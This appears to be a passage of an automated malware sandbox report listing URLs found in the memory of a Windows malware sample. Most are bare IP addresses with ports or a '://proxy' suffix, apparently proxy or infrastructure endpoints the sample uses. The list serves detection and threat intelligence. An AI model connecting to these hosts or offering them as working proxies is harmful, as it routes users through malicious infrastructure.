                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.82
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.82://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.82:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.83
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.83://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.83:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.86
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.86://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.86:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8CB35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.207.199.87:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.40
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.40://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.40:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.41
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.44://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.44:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.44p
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.45
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.45://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.45:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.47
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.47://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.47:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.29.198
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.29.198://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.29.198:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C62F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.65
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C62F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.65://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C62F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.65:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A0C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.66
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A0C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.66://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A0C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.66:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.68
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.68://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.68:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.70
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.70://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.70:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.71
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.71://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.71:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AA59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.221.74.130
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A27D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.40
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.42://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.42:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.42p
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.44
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.44://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.44:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.46
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.46://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.46:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.47
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.47://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.47:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.50
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.50://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.50:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.239.166
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.239.166://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.239.166:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.239.190
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.239.190://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.239.190:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.38.6
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.38.6://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.38.6:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.231.104.58
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.231.104.58://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.231.104.58:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.231.110.26
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.231.110.26://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.231.110.26:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C62F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.231.172.74
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C8C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.231.172.74:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.233.111.162:32100
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.233.111.162:32100://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89797000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89727000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.235.117.234:39593
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89727000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.235.117.234:39593://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.19
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.19://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.19:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.62.134.1
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.62.134.139:2655
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.62.134.139:2655://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:31785
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:31785://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89767000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89727000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:50781
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89727000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:50781://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:52814
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:52814://proxyx
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:61464
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:61464://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.133.214:16379
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.133.214:16379://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.142.4
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.142.4:16379
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.142.4:16379://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.196.1
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.196.107:16379
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.196.107:16379://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.210.79:16379
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.210.79:16379://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.212.207:16379
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.212.207:16379://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.223.24:16379
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.223.24:16379://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.247.93:16379
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.247.93:16379://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.15.252.246:16379://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.108.
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.108.134:16379
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.108.134:16379://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.108.165:16379
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.108.165:16379://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.111.76:16379
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.111.76:16379://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.119.71:16379://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.68.133:8811
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.68.133:8811://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.76.35:16379
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C62F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.77.220:16379
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C62F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.77.220:16379://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD898BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.79.76:16379
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD898BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.79.76:16379://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.96.66:16379
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.158.96.66:16379://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.159.134.210:3128
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.159.134.210:3128://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.131.
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.131.84:19987
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.131.84:19987://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.131.84:43712
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.131.84:43712://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.131.84:58612
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.131.84:58612://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A15B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.131.84:63055
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.131.84:63055://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.33.206:29360
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.161.33.206:29360://proxy
